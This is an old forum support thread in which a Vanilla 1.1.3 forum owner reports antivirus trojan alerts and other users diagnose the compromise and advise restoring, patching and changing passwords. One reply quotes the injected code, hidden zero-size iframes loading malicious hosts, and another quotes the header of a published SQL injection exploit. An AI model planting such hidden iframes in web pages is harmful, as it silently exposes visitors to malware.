Vanilla 1 is no longer supported or maintained. If you need a copy, you can get it here.
HackerOne users: Testing against this community violates our program's Terms of Service and will result in your bounty being denied.

Trojan Hack?

HortonHorton New
edited September 2008 in Vanilla 1.0 Help
The facts: I am using Vanilla 1.1.3 hosted via GoDaddy. I have not made any edits to any settings in at least a few weeks if not months. Today my users started complaining that they were getting Trojan messages from their anti-virus software. I saw it also but did not write down the name before the pop up went away. JS…. Something. (I know that does not help.) Another note the may mean nothing…. When I looked at my site I saw that the Vanilla PHP file and the two HTML files in the vanilla root showed that they have last change dates of a few days ago. I did not do that…. Using: Attachments 2.1 Google Analytics 1.2 JQMedia 0.6.3 ModTools 0.06.10b Nuggets 1.1.3 Poll 1.3 Tinymce 1.4.1 See for yourself if that is a good idea.....


  • cleanup your server and report it to your provider. He might be able to help you find out how it happened.
    Look at your logs you might find weird requests.
  • TomTesterTomTester New
    edited September 2008
    WARNING TO OTHERS: DO NOT ACCESS HORTON'S SITE UNLESS YOU RUN A SANDBOXED BROWSER Horton, Checked out your site. It's indeed hacked. Every page has lines of code inserted at the bottom, leading to dangerous sites (edit: spaces added to disable auto-linking): <iframe src="http:// msn-analytics. net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http:// pinoc. org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe> My NOD/ESET blocks for trojan attacks. I see this article outlining how it was done and help fixing it (may require editing of path in perl script, look at source): Contacting your ISP is still your best bet, because it seems the vulnerability may be related to setup of the server (TMP dir). Hope this helps. TT
  • I am clearing out everything and restoring back a week. Makes me so mad.
  • So I am going to reset my passwords as soon as the site is restored. Any other ideas? Am I right that a bot broke my FTP password and wrote to my server at GoDaddy?
  • I have now reset the whole freak'n site back a week and changed my FTP passwords to be a strong as I can figure (Uppercase, Lower Case, Numbers and symbols - 14 digits). Is there anything else I need to do to keep this from happening again?
  • Check version numbers of everything installed on the server, most popular software first and if there is something newer update it.

    Vanilla will come out with 1.1.5 shortly, so you can save that for last.
  • I don't think that FTP is the culprit. That's too cumbersome and easy to detect (by the ISP). Vanilla 1.1.3 is/was temporarily insecure, see: Install the latest version of vanilla. Note: the pinoc issue occured most on servers with an older Joomla install. If you have that installed (even if you're not using it) just remove it. If you use other popular open source tools, check them on (note: hacker site) or (note: non-hacker site) to see if they have vulnerabilities or need updates. TT
  • edited September 2008
    As far as I know the only security issue in vanilla core that would have allowed injection in html or php files was in Vanilla 1 (it did require register_globals being on).
  • milworm script says:

    ## Vanilla <= 1.1.3 Remote Blind SQL Injection Exploit
    ## By InATeam (
    ## Requirements: MySQL >= 4.1, magic_quotes_gpc=Off
    ## Tested on versions 1.1.3, 1.1.2, 1.0.1
  • edited September 2008
    I know the vulnerability in 1.1.3 is severe but I don't think it would allowed to inject code in the files.
  • Sorry Dino, I did not read your previous reply properly. I agree that Vanilla 1.1.3 probably isn't the
    'attack vector' used to make changes on the server. Suspect Horton has other software installed
    which isn't fully patched. Being that the trojan was Pinoc, Joomla is the most likely origin.
  • OK so if Vanilla and FTP passwords are not the issue?!? I have a wordpress install that I do not use and a couple of Coppermine installs. Not anything else that I can think of. What ever the path to corruption is my home page literally had code added to it. I would roll forward to the latest Vanilla but since I am not a PHP programmer if something breaks I am screwed.
This discussion has been closed.